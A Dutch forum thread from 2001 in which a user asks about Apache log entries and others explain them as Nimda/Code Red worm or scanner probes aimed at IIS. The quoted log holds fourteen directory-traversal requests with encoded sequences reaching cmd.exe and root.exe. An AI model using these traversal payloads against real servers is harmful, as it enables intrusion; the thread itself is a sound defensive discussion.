Apache log: wat betekent dit?

Pagina: 1
Acties:

  • Baf
  • Registratie: November 2000
  • Laatst online: 06-08 13:07

Baf

slopen. alles kapot maken.

Topicstarter
Ik heb Apache pas geleden geïnstalleerd onder Win2k. Omdat ie nog niet is geconfigureerd
én omdat ik niet zeker ben van de veiligheid ervan (moet ik me nog in verdiepen),
heb ik via Atguard inbound TCP port 80 geblockt.

Vanmiddag stond Atguard even uit, zie ik meteen het volgende in mijn logs (ik heb het IP
voorlopig even verminkt):
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
213.84.54.*** - - [06/Nov/2001:16:08:50 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
213.84.54.*** - - [06/Nov/2001:16:08:53 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
213.84.54.*** - - [06/Nov/2001:16:08:55 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
213.84.54.*** - - [06/Nov/2001:16:08:56 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
213.84.54.*** - - [06/Nov/2001:16:08:57 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
213.84.54.*** - - [06/Nov/2001:16:09:01 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
213.84.54.*** - - [06/Nov/2001:16:09:03 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
213.84.54.*** - - [06/Nov/2001:16:09:04 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336
213.84.54.*** - - [06/Nov/2001:16:09:05 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
213.84.54.*** - - [06/Nov/2001:16:09:06 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
213.84.54.*** - - [06/Nov/2001:16:09:08 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
213.84.54.*** - - [06/Nov/2001:16:09:10 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
213.84.54.*** - - [06/Nov/2001:16:09:11 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
213.84.54.*** - - [06/Nov/2001:16:09:12 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286

Zie ik het goed? Probeerde iemand mijn Command Prompt te starten? Kan iemand
mij precies vertellen wat hier nou is gebeurd? En hoe ik dat kan voorkomen door Apache
veilig in te stellen? Overigens zette ik halverwege Atguard weer aan en begon
ie meteen te blokken. Dus ik denk no harm done. Toch?

Toen ik vervolgens de webserver van de attacker bezocht, kon ik meteen Nimda downen.
Sowieso een lul dus. I.i.g. een berichtje naar abuse@xs4all.nl dacht ik zo.

  • BOOTZ
  • Registratie: Maart 2001
  • Laatst online: 17-03 09:38
dat zijn gewoon nimda/code red/whatever voor worms, die allerlei scriptjes in IIS proberen aan te roepen. maar omdat apache die scriptjes niet heeft kan het geen kwaad. het enige irritante is dat het in je logs komt...

Maak je eigen poll


  • Baf
  • Registratie: November 2000
  • Laatst online: 06-08 13:07

Baf

slopen. alles kapot maken.

Topicstarter
Dus geen kwade wil? Gewoon iemand die geïnfecteerd is en het waarschijnlijk niet weet?

  • jelmervos
  • Registratie: Oktober 2000
  • Niet online

jelmervos

Simple user

Op dinsdag 06 november 2001 17:44 schreef Ragger het volgende:
Dus geen kwade wil? Gewoon iemand die geïnfecteerd is en het waarschijnlijk niet weet?
Meestal wel. Het kunnen ook scanner zijn, dus dat iemand een range scant op bugs in IIS. Gewoon verder niks van aantrekken.

"The shell stopped unexpectedly and Explorer.exe was restarted."